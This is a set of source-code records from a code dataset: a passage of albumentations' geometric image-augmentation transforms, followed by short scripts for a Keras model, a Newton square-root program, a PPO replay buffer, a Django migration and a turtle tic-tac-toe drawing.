conversion from distance maps to keypoints.\n The search for keypoints works by searching for the\n argmin (non-inverted) or argmax (inverted) in each channel. This\n parameters contains the maximum (non-inverted) or minimum (inverted) value to accept in order to view a hit\n as a keypoint. Use ``None`` to use no min/max. 
Default: 0.01\n\n Targets:\n image, mask, keypoints, bboxes\n\n Image types:\n uint8, float32\n\n \"\"\"\n\n def __init__(\n self,\n scale: ScaleFloatType = (0.03, 0.05),\n nb_rows: Union[int, Sequence[int]] = 4,\n nb_cols: Union[int, Sequence[int]] = 4,\n interpolation: int = 1,\n mask_interpolation: int = 0,\n cval: int = 0,\n cval_mask: int = 0,\n mode: str = \"constant\",\n absolute_scale: bool = False,\n always_apply: bool = False,\n keypoints_threshold: float = 0.01,\n p: float = 0.5,\n ):\n super(PiecewiseAffine, self).__init__(always_apply, p)\n\n self.scale = to_tuple(scale, scale)\n self.nb_rows = to_tuple(nb_rows, nb_rows)\n self.nb_cols = to_tuple(nb_cols, nb_cols)\n self.interpolation = interpolation\n self.mask_interpolation = mask_interpolation\n self.cval = cval\n self.cval_mask = cval_mask\n self.mode = mode\n self.absolute_scale = absolute_scale\n self.keypoints_threshold = keypoints_threshold\n\n def get_transform_init_args_names(self):\n return (\n \"scale\",\n \"nb_rows\",\n \"nb_cols\",\n \"interpolation\",\n \"mask_interpolation\",\n \"cval\",\n \"cval_mask\",\n \"mode\",\n \"absolute_scale\",\n \"keypoints_threshold\",\n )\n\n @property\n def targets_as_params(self):\n return [\"image\"]\n\n def get_params_dependent_on_targets(self, params) -> dict:\n h, w = params[\"image\"].shape[:2]\n\n nb_rows = np.clip(random.randint(*self.nb_rows), 2, None)\n nb_cols = np.clip(random.randint(*self.nb_cols), 2, None)\n nb_cells = nb_cols * nb_rows\n scale = random.uniform(*self.scale)\n\n jitter: np.ndarray = random_utils.normal(0, scale, (nb_cells, 2))\n if not np.any(jitter > 0):\n return {\"matrix\": None}\n\n y = np.linspace(0, h, nb_rows)\n x = np.linspace(0, w, nb_cols)\n\n # (H, W) and (H, W) for H=rows, W=cols\n xx_src, yy_src = np.meshgrid(x, y)\n\n # (1, HW, 2) => (HW, 2) for H=rows, W=cols\n points_src = np.dstack([yy_src.flat, xx_src.flat])[0]\n\n if self.absolute_scale:\n jitter[:, 0] = jitter[:, 0] / h if h > 0 else 0.0\n jitter[:, 1] = jitter[:, 1] / w if w > 0 else 0.0\n\n jitter[:, 0] = jitter[:, 0] * h\n jitter[:, 1] = jitter[:, 1] * w\n\n points_dest = np.copy(points_src)\n points_dest[:, 0] = points_dest[:, 0] + jitter[:, 0]\n points_dest[:, 1] = points_dest[:, 1] + jitter[:, 1]\n\n # Restrict all destination points to be inside the image plane.\n # This is necessary, as otherwise keypoints could be augmented\n # outside of the image plane and these would be replaced by\n # (-1, -1), which would not conform with the behaviour of the other augmenters.\n points_dest[:, 0] = np.clip(points_dest[:, 0], 0, h - 1)\n points_dest[:, 1] = np.clip(points_dest[:, 1], 0, w - 1)\n\n matrix = skimage.transform.PiecewiseAffineTransform()\n matrix.estimate(points_src[:, ::-1], points_dest[:, ::-1])\n\n return {\n \"matrix\": matrix,\n }\n\n def apply(self, img: np.ndarray, matrix: skimage.transform.PiecewiseAffineTransform = None, **params) -> np.ndarray:\n return F.piecewise_affine(img, matrix, self.interpolation, self.mode, self.cval)\n\n def apply_to_mask(\n self, img: np.ndarray, matrix: skimage.transform.PiecewiseAffineTransform = None, **params\n ) -> np.ndarray:\n return F.piecewise_affine(img, matrix, self.mask_interpolation, self.mode, self.cval_mask)\n\n def apply_to_bbox(\n self,\n bbox: BoxInternalType,\n rows: int = 0,\n cols: int = 0,\n matrix: skimage.transform.PiecewiseAffineTransform = None,\n **params\n ) -> BoxInternalType:\n return F.bbox_piecewise_affine(bbox, matrix, rows, cols, self.keypoints_threshold)\n\n def apply_to_keypoint(\n self,\n keypoint: 
KeypointInternalType,\n rows: int = 0,\n cols: int = 0,\n matrix: skimage.transform.PiecewiseAffineTransform = None,\n **params\n ):\n return F.keypoint_piecewise_affine(keypoint, matrix, rows, cols, self.keypoints_threshold)\n\n\nclass PadIfNeeded(DualTransform):\n \"\"\"Pad side of the image / max if side is less than desired number.\n\n Args:\n min_height (int): minimal result image height.\n min_width (int): minimal result image width.\n pad_height_divisor (int): if not None, ensures image height is dividable by value of this argument.\n pad_width_divisor (int): if not None, ensures image width is dividable by value of this argument.\n position (Union[str, PositionType]): Position of the image. should be PositionType.CENTER or\n PositionType.TOP_LEFT or PositionType.TOP_RIGHT or PositionType.BOTTOM_LEFT or PositionType.BOTTOM_RIGHT.\n or PositionType.RANDOM. Default: PositionType.CENTER.\n border_mode (OpenCV flag): OpenCV border mode.\n value (int, float, list of int, list of float): padding value if border_mode is cv2.BORDER_CONSTANT.\n mask_value (int, float,\n list of int,\n list of float): padding value for mask if border_mode is cv2.BORDER_CONSTANT.\n p (float): probability of applying the transform. Default: 1.0.\n\n Targets:\n image, mask, bbox, keypoints\n\n Image types:\n uint8, float32\n \"\"\"\n\n class PositionType(Enum):\n CENTER = \"center\"\n TOP_LEFT = \"top_left\"\n TOP_RIGHT = \"top_right\"\n BOTTOM_LEFT = \"bottom_left\"\n BOTTOM_RIGHT = \"bottom_right\"\n RANDOM = \"random\"\n\n def __init__(\n self,\n min_height: Optional[int] = 1024,\n min_width: Optional[int] = 1024,\n pad_height_divisor: Optional[int] = None,\n pad_width_divisor: Optional[int] = None,\n position: Union[PositionType, str] = PositionType.CENTER,\n border_mode: int = cv2.BORDER_REFLECT_101,\n value: Optional[ImageColorType] = None,\n mask_value: Optional[ImageColorType] = None,\n always_apply: bool = False,\n p: float = 1.0,\n ):\n if (min_height is None) == (pad_height_divisor is None):\n raise ValueError(\"Only one of 'min_height' and 'pad_height_divisor' parameters must be set\")\n\n if (min_width is None) == (pad_width_divisor is None):\n raise ValueError(\"Only one of 'min_width' and 'pad_width_divisor' parameters must be set\")\n\n super(PadIfNeeded, self).__init__(always_apply, p)\n self.min_height = min_height\n self.min_width = min_width\n self.pad_width_divisor = pad_width_divisor\n self.pad_height_divisor = pad_height_divisor\n self.position = PadIfNeeded.PositionType(position)\n self.border_mode = border_mode\n self.value = value\n self.mask_value = mask_value\n\n def update_params(self, params, **kwargs):\n params = super(PadIfNeeded, self).update_params(params, **kwargs)\n rows = params[\"rows\"]\n cols = params[\"cols\"]\n\n if self.min_height is not None:\n if rows < self.min_height:\n h_pad_top = int((self.min_height - rows) / 2.0)\n h_pad_bottom = self.min_height - rows - h_pad_top\n else:\n h_pad_top = 0\n h_pad_bottom = 0\n else:\n pad_remained = rows % self.pad_height_divisor\n pad_rows = self.pad_height_divisor - pad_remained if pad_remained > 0 else 0\n\n h_pad_top = pad_rows // 2\n h_pad_bottom = pad_rows - h_pad_top\n\n if self.min_width is not None:\n if cols < self.min_width:\n w_pad_left = int((self.min_width - cols) / 2.0)\n w_pad_right = self.min_width - cols - w_pad_left\n else:\n w_pad_left = 0\n w_pad_right = 0\n else:\n pad_remainder = cols % self.pad_width_divisor\n pad_cols = self.pad_width_divisor - pad_remainder if pad_remainder > 0 else 0\n\n w_pad_left = 
pad_cols // 2\n w_pad_right = pad_cols - w_pad_left\n\n h_pad_top, h_pad_bottom, w_pad_left, w_pad_right = self.__update_position_params(\n h_top=h_pad_top, h_bottom=h_pad_bottom, w_left=w_pad_left, w_right=w_pad_right\n )\n\n params.update(\n {\n \"pad_top\": h_pad_top,\n \"pad_bottom\": h_pad_bottom,\n \"pad_left\": w_pad_left,\n \"pad_right\": w_pad_right,\n }\n )\n return params\n\n def apply(\n self, img: np.ndarray, pad_top: int = 0, pad_bottom: int = 0, pad_left: int = 0, pad_right: int = 0, **params\n ) -> np.ndarray:\n return F.pad_with_params(\n img,\n pad_top,\n pad_bottom,\n pad_left,\n pad_right,\n border_mode=self.border_mode,\n value=self.value,\n )\n\n def apply_to_mask(\n self, img: np.ndarray, pad_top: int = 0, pad_bottom: int = 0, pad_left: int = 0, pad_right: int = 0, **params\n ) -> np.ndarray:\n return F.pad_with_params(\n img,\n pad_top,\n pad_bottom,\n pad_left,\n pad_right,\n border_mode=self.border_mode,\n value=self.mask_value,\n )\n\n def apply_to_bbox(\n self,\n bbox: BoxInternalType,\n pad_top: int = 0,\n pad_bottom: int = 0,\n pad_left: int = 0,\n pad_right: int = 0,\n rows: int = 0,\n cols: int = 0,\n **params\n ) -> BoxInternalType:\n x_min, y_min, x_max, y_max = denormalize_bbox(bbox, rows, cols)[:4]\n bbox = x_min + pad_left, y_min + pad_top, x_max + pad_left, y_max + pad_top\n return normalize_bbox(bbox, rows + pad_top + pad_bottom, cols + pad_left + pad_right)\n\n def apply_to_keypoint(\n self,\n keypoint: KeypointInternalType,\n pad_top: int = 0,\n pad_bottom: int = 0,\n pad_left: int = 0,\n pad_right: int = 0,\n **params\n ) -> KeypointInternalType:\n x, y, angle, scale = keypoint[:4]\n return x + pad_left, y + pad_top, angle, scale\n\n def get_transform_init_args_names(self):\n return (\n \"min_height\",\n \"min_width\",\n \"pad_height_divisor\",\n \"pad_width_divisor\",\n \"border_mode\",\n \"value\",\n \"mask_value\",\n )\n\n def __update_position_params(\n self, h_top: int, h_bottom: int, w_left: int, w_right: int\n ) -> Tuple[int, int, int, int]:\n if self.position == PadIfNeeded.PositionType.TOP_LEFT:\n h_bottom += h_top\n w_right += w_left\n h_top = 0\n w_left = 0\n\n elif self.position == PadIfNeeded.PositionType.TOP_RIGHT:\n h_bottom += h_top\n w_left += w_right\n h_top = 0\n w_right = 0\n\n elif self.position == PadIfNeeded.PositionType.BOTTOM_LEFT:\n h_top += h_bottom\n w_right += w_left\n h_bottom = 0\n w_left = 0\n\n elif self.position == PadIfNeeded.PositionType.BOTTOM_RIGHT:\n h_top += h_bottom\n w_left += w_right\n h_bottom = 0\n w_right = 0\n\n elif self.position == PadIfNeeded.PositionType.RANDOM:\n h_pad = h_top + h_bottom\n w_pad = w_left + w_right\n h_top = random.randint(0, h_pad)\n h_bottom = h_pad - h_top\n w_left = random.randint(0, w_pad)\n w_right = w_pad - w_left\n\n return h_top, h_bottom, w_left, w_right\n\n\nclass VerticalFlip(DualTransform):\n \"\"\"Flip the input vertically around the x-axis.\n\n Args:\n p (float): probability of applying the transform. 
Default: 0.5.\n\n Targets:\n image, mask, bboxes, keypoints\n\n Image types:\n uint8, float32\n \"\"\"\n\n def apply(self, img: np.ndarray, **params) -> np.ndarray:\n return F.vflip(img)\n\n def apply_to_bbox(self, bbox: BoxInternalType, **params) -> BoxInternalType:\n return F.bbox_vflip(bbox, **params)\n\n def apply_to_keypoint(self, keypoint: KeypointInternalType, **params) -> KeypointInternalType:\n return F.keypoint_vflip(keypoint, **params)\n\n def get_transform_init_args_names(self):\n return ()\n\n\nclass HorizontalFlip(DualTransform):\n \"\"\"Flip the input horizontally around the y-axis.\n\n Args:\n p (float): probability of applying the transform. Default: 0.5.\n\n Targets:\n image, mask, bboxes, keypoints\n\n Image types:\n uint8, float32\n \"\"\"\n\n def apply(self, img: np.ndarray, **params) -> np.ndarray:\n if img.ndim == 3 and img.shape[2] > 1 and img.dtype == np.uint8:\n # Opencv is faster than numpy only in case of\n # non-gray scale 8bits images\n return F.hflip_cv2(img)\n\n return F.hflip(img)\n\n def apply_to_bbox(self, bbox: BoxInternalType, **params) -> BoxInternalType:\n return F.bbox_hflip(bbox, **params)\n\n def apply_to_keypoint(self, keypoint: KeypointInternalType, **params) -> KeypointInternalType:\n return F.keypoint_hflip(keypoint, **params)\n\n def get_transform_init_args_names(self):\n return ()\n\n\nclass Flip(DualTransform):\n \"\"\"Flip the input either horizontally, vertically or both horizontally and vertically.\n\n Args:\n p (float): probability of applying the transform. Default: 0.5.\n\n Targets:\n image, mask, bboxes, keypoints\n\n Image types:\n uint8, float32\n \"\"\"\n\n def apply(self, img: np.ndarray, d: int = 0, **params) -> np.ndarray:\n \"\"\"Args:\n d (int): code that specifies how to flip the input. 0 for vertical flipping, 1 for horizontal flipping,\n -1 for both vertical and horizontal flipping (which is also could be seen as rotating the input by\n 180 degrees).\n \"\"\"\n return F.random_flip(img, d)\n\n def get_params(self):\n # Random int in the range [-1, 1]\n return {\"d\": random.randint(-1, 1)}\n\n def apply_to_bbox(self, bbox: BoxInternalType, **params) -> BoxInternalType:\n return F.bbox_flip(bbox, **params)\n\n def apply_to_keypoint(self, keypoint: KeypointInternalType, **params) -> KeypointInternalType:\n return F.keypoint_flip(keypoint, **params)\n\n def get_transform_init_args_names(self):\n return ()\n\n\nclass Transpose(DualTransform):\n \"\"\"Transpose the input by swapping rows and columns.\n\n Args:\n p (float): probability of applying the transform. Default: 0.5.\n\n Targets:\n image, mask, bboxes, keypoints\n\n Image types:\n uint8, float32\n \"\"\"\n\n def apply(self, img: np.ndarray, **params) -> np.ndarray:\n return F.transpose(img)\n\n def apply_to_bbox(self, bbox: BoxInternalType, **params) -> BoxInternalType:\n return F.bbox_transpose(bbox, 0, **params)\n\n def apply_to_keypoint(self, keypoint: KeypointInternalType, **params) -> KeypointInternalType:\n return F.keypoint_transpose(keypoint)\n\n def get_transform_init_args_names(self):\n return ()\n\n\nclass OpticalDistortion(DualTransform):\n \"\"\"\n Args:\n distort_limit (float, (float, float)): If distort_limit is a single float, the range\n will be (-distort_limit, distort_limit). Default: (-0.05, 0.05).\n shift_limit (float, (float, float))): If shift_limit is a single float, the range\n will be (-shift_limit, shift_limit). Default: (-0.05, 0.05).\n interpolation (OpenCV flag): flag that is used to specify the interpolation algorithm. 
Should be one of:\n cv2.INTER_NEAREST, cv2.INTER_LINEAR, cv2.INTER_CUBIC, cv2.INTER_AREA, cv2.INTER_LANCZOS4.\n Default: cv2.INTER_LINEAR.\n border_mode (OpenCV flag): flag that is used to specify the pixel extrapolation method. Should be one of:\n cv2.BORDER_CONSTANT, cv2.BORDER_REPLICATE, cv2.BORDER_REFLECT, cv2.BORDER_WRAP, cv2.BORDER_REFLECT_101.\n Default: cv2.BORDER_REFLECT_101\n value (int, float, list of ints, list of float): padding value if border_mode is cv2.BORDER_CONSTANT.\n mask_value (int, float,\n list of ints,\n list of float): padding value if border_mode is cv2.BORDER_CONSTANT applied for masks.\n\n Targets:\n image, mask, bbox\n\n Image types:\n uint8, float32\n \"\"\"\n\n def __init__(\n self,\n distort_limit: ScaleFloatType = 0.05,\n shift_limit: ScaleFloatType = 0.05,\n interpolation: int = cv2.INTER_LINEAR,\n border_mode: int = cv2.BORDER_REFLECT_101,\n value: Optional[ImageColorType] = None,\n mask_value: Optional[ImageColorType] = None,\n always_apply: bool = False,\n p: float = 0.5,\n ):\n super(OpticalDistortion, self).__init__(always_apply, p)\n self.shift_limit = to_tuple(shift_limit)\n self.distort_limit = to_tuple(distort_limit)\n self.interpolation = interpolation\n self.border_mode = border_mode\n self.value = value\n self.mask_value = mask_value\n\n def apply(\n self, img: np.ndarray, k: int = 0, dx: int = 0, dy: int = 0, interpolation: int = cv2.INTER_LINEAR, **params\n ) -> np.ndarray:\n return F.optical_distortion(img, k, dx, dy, interpolation, self.border_mode, self.value)\n\n def apply_to_mask(self, img: np.ndarray, k: int = 0, dx: int = 0, dy: int = 0, **params) -> np.ndarray:\n return F.optical_distortion(img, k, dx, dy, cv2.INTER_NEAREST, self.border_mode, self.mask_value)\n\n def apply_to_bbox(self, bbox: BoxInternalType, k: int = 0, dx: int = 0, dy: int = 0, **params) -> BoxInternalType:\n rows, cols = params[\"rows\"], params[\"cols\"]\n mask = np.zeros((rows, cols), dtype=np.uint8)\n bbox_denorm = F.denormalize_bbox(bbox, rows, cols)\n x_min, y_min, x_max, y_max = bbox_denorm[:4]\n x_min, y_min, x_max, y_max = int(x_min), int(y_min), int(x_max), int(y_max)\n mask[y_min:y_max, x_min:x_max] = 1\n mask = F.optical_distortion(mask, k, dx, dy, cv2.INTER_NEAREST, self.border_mode, self.mask_value)\n bbox_returned = bbox_from_mask(mask)\n bbox_returned = F.normalize_bbox(bbox_returned, rows, cols)\n return bbox_returned\n\n def get_params(self):\n return {\n \"k\": random.uniform(self.distort_limit[0], self.distort_limit[1]),\n \"dx\": round(random.uniform(self.shift_limit[0], self.shift_limit[1])),\n \"dy\": round(random.uniform(self.shift_limit[0], self.shift_limit[1])),\n }\n\n def get_transform_init_args_names(self):\n return (\n \"distort_limit\",\n \"shift_limit\",\n \"interpolation\",\n \"border_mode\",\n \"value\",\n \"mask_value\",\n )\n\n\nclass GridDistortion(DualTransform):\n \"\"\"\n Args:\n num_steps (int): count of grid cells on each side.\n distort_limit (float, (float, float)): If distort_limit is a single float, the range\n will be (-distort_limit, distort_limit). Default: (-0.03, 0.03).\n interpolation (OpenCV flag): flag that is used to specify the interpolation algorithm. Should be one of:\n cv2.INTER_NEAREST, cv2.INTER_LINEAR, cv2.INTER_CUBIC, cv2.INTER_AREA, cv2.INTER_LANCZOS4.\n Default: cv2.INTER_LINEAR.\n border_mode (OpenCV flag): flag that is used to specify the pixel extrapolation method. 
Should be one of:\n cv2.BORDER_CONSTANT, cv2.BORDER_REPLICATE, cv2.BORDER_REFLECT, cv2.BORDER_WRAP, cv2.BORDER_REFLECT_101.\n Default: cv2.BORDER_REFLECT_101\n value (int, float, list of ints, list of float): padding value if border_mode is cv2.BORDER_CONSTANT.\n mask_value (int, float,\n list of ints,\n list of float): padding value if border_mode is cv2.BORDER_CONSTANT applied for masks.\n normalized (bool): if true, distortion will be normalized to do not go outside the image. Default: False\n See for more information: https://github.com/albumentations-team/albumentations/pull/722\n\n Targets:\n image, mask\n\n Image types:\n uint8, float32\n \"\"\"\n\n def __init__(\n self,\n num_steps: int = 5,\n distort_limit: ScaleFloatType = 0.3,\n interpolation: int = cv2.INTER_LINEAR,\n border_mode: int = cv2.BORDER_REFLECT_101,\n value: Optional[ImageColorType] = None,\n mask_value: Optional[ImageColorType] = None,\n normalized: bool = False,\n always_apply: bool = False,\n p: float = 0.5,\n ):\n super(GridDistortion, self).__init__(always_apply, p)\n self.num_steps = num_steps\n self.distort_limit = to_tuple(distort_limit)\n self.interpolation = interpolation\n self.border_mode = border_mode\n self.value = value\n self.mask_value = mask_value\n self.normalized = normalized\n\n def apply(\n self, img: np.ndarray, stepsx: Tuple = (), stepsy: Tuple = (), interpolation: int = cv2.INTER_LINEAR, **params\n ) -> np.ndarray:\n return F.grid_distortion(img, self.num_steps, stepsx, stepsy, interpolation, self.border_mode, self.value)\n\n def apply_to_mask(self, img: np.ndarray, stepsx: Tuple = (), stepsy: Tuple = (), **params) -> np.ndarray:\n return F.grid_distortion(\n img, self.num_steps, stepsx, stepsy, cv2.INTER_NEAREST, self.border_mode, self.mask_value\n )\n\n def apply_to_bbox(self, bbox: BoxInternalType, stepsx: Tuple = (), stepsy: Tuple = (), **params) -> BoxInternalType:\n rows, cols = params[\"rows\"], params[\"cols\"]\n mask = np.zeros((rows, cols), dtype=np.uint8)\n bbox_denorm = F.denormalize_bbox(bbox, rows, cols)\n x_min, y_min, x_max, y_max = bbox_denorm[:4]\n x_min, y_min, x_max, y_max = int(x_min), int(y_min), int(x_max), int(y_max)\n mask[y_min:y_max, x_min:x_max] = 1\n mask = F.grid_distortion(\n mask, self.num_steps, stepsx, stepsy, cv2.INTER_NEAREST, self.border_mode, self.mask_value\n )\n bbox_returned = bbox_from_mask(mask)\n bbox_returned = F.normalize_bbox(bbox_returned, rows, cols)\n return bbox_returned\n\n def _normalize(self, h, w, xsteps, ysteps):\n # compensate for smaller last steps in source image.\n x_step = w // self.num_steps\n last_x_step = min(w, ((self.num_steps + 1) * x_step)) - (self.num_steps * x_step)\n xsteps[-1] *= last_x_step / x_step\n\n y_step = h // self.num_steps\n last_y_step = min(h, ((self.num_steps + 1) * y_step)) - (self.num_steps * y_step)\n ysteps[-1] *= last_y_step / y_step\n\n # now normalize such that distortion never leaves image bounds.\n tx = w / math.floor(w / self.num_steps)\n ty = h / math.floor(h / self.num_steps)\n xsteps = np.array(xsteps) * (tx / np.sum(xsteps))\n ysteps = np.array(ysteps) * (ty / np.sum(ysteps))\n\n return {\"stepsx\": xsteps, \"stepsy\": ysteps}\n\n @property\n def targets_as_params(self):\n return [\"image\"]\n\n def get_params_dependent_on_targets(self, params):\n h, w = params[\"image\"].shape[:2]\n\n stepsx = [1 + random.uniform(self.distort_limit[0], self.distort_limit[1]) for _ in range(self.num_steps + 1)]\n stepsy = [1 + random.uniform(self.distort_limit[0], self.distort_limit[1]) for _ in 
range(self.num_steps + 1)]\n\n if self.normalized:\n return self._normalize(h, w, stepsx, stepsy)\n\n return {\"stepsx\": stepsx, \"stepsy\": stepsy}\n\n def get_transform_init_args_names(self):\n return \"num_steps\", \"distort_limit\", \"interpolation\", \"border_mode\", \"value\", \"mask_value\", \"normalized\"\n","repo_name":"albumentations-team/albumentations","sub_path":"albumentations/augmentations/geometric/transforms.py","file_name":"transforms.py","file_ext":"py","file_size_in_byte":62848,"program_lang":"python","lang":"en","doc_type":"code","stars":12818,"dataset":"github-code","pt":"16"}
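A minimal usage sketch for the transforms defined in this module, assuming the albumentations package is installed; the parameter values and the dummy image are arbitrary choices for illustration.

```python
import numpy as np
import albumentations as A

# Compose a few of the geometric transforms defined above
transform = A.Compose([
    A.HorizontalFlip(p=0.5),
    A.ShiftScaleRotate(shift_limit=0.0625, scale_limit=0.1, rotate_limit=45, p=0.5),
    A.PadIfNeeded(min_height=256, min_width=256, p=1.0),
])

# Dummy uint8 image; in practice this would come from cv2.imread or similar
image = np.random.randint(0, 256, (200, 300, 3), dtype=np.uint8)
augmented = transform(image=image)["image"]
print(augmented.shape)  # height is padded to at least 256 by PadIfNeeded
```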
+{"seq_id":"9970624977","text":"import tensorflow as tf\r\nimport keras.layers\r\n\r\nn_neurons_h = 178\r\nn_neurons_out = 3\r\nn_epochs = 4500\r\nlearning_rate = 0.7\r\n\r\nmodel = tf.keras.Sequential()\r\nmodel.add(layers.Dense(n_neurons_h, activation=\"tanh\"))\r\nmodel.add(layers.Dense(n_neurons_h, activation=\"tanh\"))\r\nmodel.add(layers.Dense(n_neurons_out, activation=\"softmax\"))\r\n\r\nmodel.fit(training_data, training_labels, epochs=n_epochs, batch_size=32)\r\n\r\nmodel.compile(optimizer=tf.train.GradientDescentOptimizer(learning_rate=learning_rate), loss=\"binary_crossentropy\",\r\n metrics=[\"accuracy\"])\r\nmodel.fit(training_X, training_y, epochs=n_epochs)\r\n","repo_name":"Yasaman1997/Principles_Of_Datamining","sub_path":"HW3/Part2/Drinks/drinks/tensorflow.py","file_name":"tensorflow.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"16"}
+{"seq_id":"10709110775","text":"# squareroot.py\n# This program takes a postiive floating point number as input\n# and outputs an approximation of its square root\n# author: Rachel King\n\ndef sqrt(n) :\n # Assuming the sqrt of n as n only\n x = n\n # To count the number of iterations\n count = 0\n while (1) :\n count += 1\n # Calculate estimate\n root = 0.5 * (x + (n / x))\n # Check for closeness # this is to set how accurate we want the result to be\n if (abs(root - x) < 0.0001) : # it's set to be accurate within 0.0001 \n break\n # Update root\n x = root\n return root\ndef amount(message = \"Please enter a postive number: \"):\n num = False\n while (not num):\n try:\n num = float(input(message))\n except ValueError:\n print(\"That was not a number: \",end=\"\")\n return num\nn = amount()\nanswer = float(sqrt(n))\nanswer_rounded = \"{:.1f}\".format(answer)\nprint(f\"The square root of {n} is approx. {answer_rounded}\")","repo_name":"rachel-king4/pands-problem-sheet","sub_path":"squareroot.py","file_name":"squareroot.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"70916798090","text":"import jax\nimport jax.numpy as jnp\nimport dm_env\nimport numpy as np\n\n\nclass FixedReplayBuffer:\n \"\"\"Fixed-size buffer to store transition tuples.\"\"\"\n\n def __init__(self, key_replay_buffer) -> None:\n self.timestep = None\n self.last_value = None\n self._key_replay_buffer = key_replay_buffer\n\n # values_t stores one more step (it also stores last value)\n self.values_t = []\n self.obs_t = []\n self.actions_t = []\n self.rewards_tp1 = []\n self.advantages_t = []\n self.dones_tp1 = []\n self.logprobs_t = []\n\n def __len__(self):\n return len(self.dones_tp1)\n\n def add_first(self, timestep: dm_env.TimeStep) -> None:\n self.timestep = timestep\n\n def add(self, value: float, log_probability: float, action: np.ndarray, next_timestep: dm_env.TimeStep) -> None:\n \"\"\"Add a new transition to memory.\"\"\"\n assert self.timestep is not None, \"Please let the agent observe a first timestep.\"\n\n self.values_t.append(value)\n self.obs_t.append(self.timestep.observation)\n self.actions_t.append(action)\n self.rewards_tp1.append(next_timestep.reward)\n self.dones_tp1.append(next_timestep.last())\n self.logprobs_t.append(log_probability)\n self.timestep = next_timestep\n\n def add_last_value(self, value: float) -> None:\n self.values_t.append(value)\n\n def clear_memory(self):\n self.values_t = []\n self.obs_t = []\n self.actions_t = []\n self.rewards_tp1 = []\n self.advantages_t = []\n self.dones_tp1 = []\n self.logprobs_t = []\n\n def add_advantages(self, advantages):\n self.advantages_t = advantages\n\n def cast_to_numpy(self):\n self.values_t = np.array(self.values_t)\n self.obs_t = np.array(self.obs_t)\n self.actions_t = np.array(self.actions_t)\n self.rewards_tp1 = np.array(self.rewards_tp1)\n self.dones_tp1 = np.array(self.dones_tp1)\n self.logprobs_t = np.array(self.logprobs_t)\n","repo_name":"emasquil/ppo","sub_path":"ppo/replay_buffers/fixed_replay_buffer.py","file_name":"fixed_replay_buffer.py","file_ext":"py","file_size_in_byte":2032,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"28964575004","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Setting',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('class_name', models.CharField(max_length=100, editable=False)),\n ('name', models.CharField(max_length=100, editable=False)),\n ('verbose_name', models.CharField(max_length=100)),\n ('description', models.TextField(null=True, blank=True)),\n ('value', models.TextField(null=True, blank=True)),\n ('last_modified_date', models.DateTimeField(auto_now=True)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n ]\n","repo_name":"McHogardty/MedBank","sub_path":"medbank/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"37043148034","text":"# Abhinav Bassi\n# CS 100 2014F Section H03\n# TTTP2: Oct 22, 2014\n\n# 1\n\ndef tttDrawMove(t, row, col, mark, edge):\n buffer = (.2*edge)\n newEdge = edge - (2*buffer)\n t.up()\n t.width(1)\n t.goto(0,0)\n if row == 0:\n y = -((3/2)*edge)\n elif row == 1:\n y = -((1/2)*edge)\n elif row == 2:\n y = ((1/2)*edge)\n if col == 0:\n x = 0-edge\n elif col == 1:\n x = 0\n elif col == 2:\n x = 0+edge\n t.goto(x,y)\n if mark =='x' or mark == 'X':\n t.up()\n t.setheading(0)\n t.forward(newEdge/2)\n t.left(90)\n t.forward(buffer)\n t.setheading(0)\n t.left(135)\n t.down()\n t.forward(math.sqrt((newEdge**2)+(newEdge**2)))\n t.up()\n t.setheading(0)\n t.forward(newEdge)\n t.right(135)\n t.down()\n t.forward(math.sqrt((newEdge**2)+(newEdge**2)))\n t.up()\n t.setheading(0)\n t.goto(0,0)\n if mark =='o' or mark == 'O':\n t.up()\n t.setheading(0)\n t.left(90)\n t.forward(buffer)\n t.setheading(0)\n t.down()\n t.circle(newEdge/2)\n t.up()\n t.setheading(0)\n t.goto(0,0)\n\n# 2\n\ndef drawGrid(t, length, x, y):\n t.width(2)\n beginX = [x, x, x+length, x+(2*length)]\n endX = [x+(3*length), x+(3*length), x+(length), x+(2*length)]\n beginY = [y+(2*length), y+length, y, y]\n endY = [y+(2*length), y+length, y+(3*length), y+(3*length)]\n for i in range(4):\n t.up()\n t.goto(beginX[i],beginY[i])\n t.down()\n t.goto(endX[i],endY[i])\n\nimport turtle\ns = turtle.Screen()\npen = turtle.Turtle()\ndrawGrid(pen,100,-150,-150)\n\nimport math\ntttDrawMove(pen, 0, 0, 'X', 100)\ntttDrawMove(pen, 0, 1, 'X', 100)\ntttDrawMove(pen, 0, 2, 'X', 100)\ntttDrawMove(pen, 1, 0, 'O', 100)\ntttDrawMove(pen, 1, 1, 'O', 100)\ntttDrawMove(pen, 1, 2, 'O', 100)\n","repo_name":"abhibassi/cs100","sub_path":"TTTP2_AbhinavBassi.py","file_name":"TTTP2_AbhinavBassi.py","file_ext":"py","file_size_in_byte":1884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
